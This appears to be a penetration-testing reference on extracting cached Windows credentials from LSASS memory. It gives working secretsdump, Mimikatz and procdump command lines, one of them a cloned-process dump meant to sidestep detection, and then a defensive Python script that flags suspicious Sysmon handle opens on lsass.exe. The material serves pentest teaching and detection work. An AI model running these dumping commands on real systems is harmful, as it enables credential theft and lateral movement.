LSASS Credentials
The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.
When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials are cached in the LSASS process so that Single Sign-On (SSO) can be used when a network logon is required to access services on the domain.
To access LSASS process memory and extract credentials, you must have a user account with SeDebugPrivilege on the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges on the computer.
There are many tools and a great deal of research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is covered here, especially once you look into protections against LSASS dumping and evading EDR.
Regardless, below are a few popular methods that may still work in organizations that have not yet undergone any penetration tests.
```
secretsdump.py <domain/>[username]<:password><@computer> <options>
```

OPTIONS
-outputfile Base Output Filename
-hashes Authenticate Using LMHASH:NTHASH
-k Use Kerberos Auth From ccache File

```
## Run Mimikatz
mimikatz.exe
## Enable SeDebugPrivilege In Your Terminal
privilege::debug
## Dump LSASS Memory
sekurlsa::logonpasswords
```

You can create a minidump of the lsass.exe process using the Task Manager running as administrator. Simply locate lsass.exe, right-click on it, and select Create Dump File. We can then use Mimikatz to read the dump.

```
## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]
## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords
```

```
## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
## Avoid Reading LSASS By Dumping Cloned LSASS Process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
```
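As a defender-side counterpart to the methods above, here is an added Python example (not from the original page) that scans Sysmon Event ID 10 (ProcessAccess) records for handle opens on lsass.exe carrying memory-read or process-clone rights, with a small allowlist of Windows processes that touch lsass legitimately. The sample records, their key=value flattening and the allowlist are constructed assumptions; tune the allowlist to your own baseline.

```python
import re

# Access-mask bits (winnt.h) that let a caller read, write or clone another
# process: VM_OPERATION 0x08, VM_READ 0x10, VM_WRITE 0x20, DUP_HANDLE 0x40,
# CREATE_PROCESS 0x80 (the last is what a reflected/cloned lsass dump needs).
SUSPICIOUS_MASK = 0x08 | 0x10 | 0x20 | 0x40 | 0x80

# Processes that open lsass.exe during normal Windows operation. Matched on the
# full System32 path so a copied binary elsewhere does not inherit the pass.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

KV_RE = re.compile(r"(\w+)=(\S+)")  # flattened records; values carry no spaces here

def parse_event(line):
    """Turn a flattened 'Key=Value Key=Value' Sysmon record into a dict."""
    return dict(KV_RE.findall(line))

def check_event(line):
    """Return (SourceImage, GrantedAccess) for a suspicious lsass handle open, else None."""
    ev = parse_event(line)
    if ev.get("EventID") != "10":  # only Sysmon ProcessAccess events
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    granted = int(ev.get("GrantedAccess", "0"), 16)
    source = ev.get("SourceImage", "")
    if not granted & SUSPICIOUS_MASK or source.lower() in BENIGN_SOURCES:
        return None
    return source, granted

def scan(lines):
    """Run check_event over a batch of log lines and keep only the hits."""
    return [hit for hit in map(check_event, lines) if hit]

# Constructed sample records (not real telemetry), flattened to key=value.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1400",
    r"EventID=10 SourceImage=C:\Tools\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Users\bob\Desktop\mimikatz.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventID=10 SourceImage=C:\Windows\System32\Taskmgr.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=1 Image=C:\Windows\System32\notepad.exe",
]
for source, granted in scan(SAMPLE_EVENTS):
    print(f"suspicious lsass access: {source} GrantedAccess=0x{granted:X}")
```

The svchost open with 0x1400 (query-only rights) and the csrss open are not reported; the procdump, mimikatz and Task Manager opens are, which matches the three dump methods shown above.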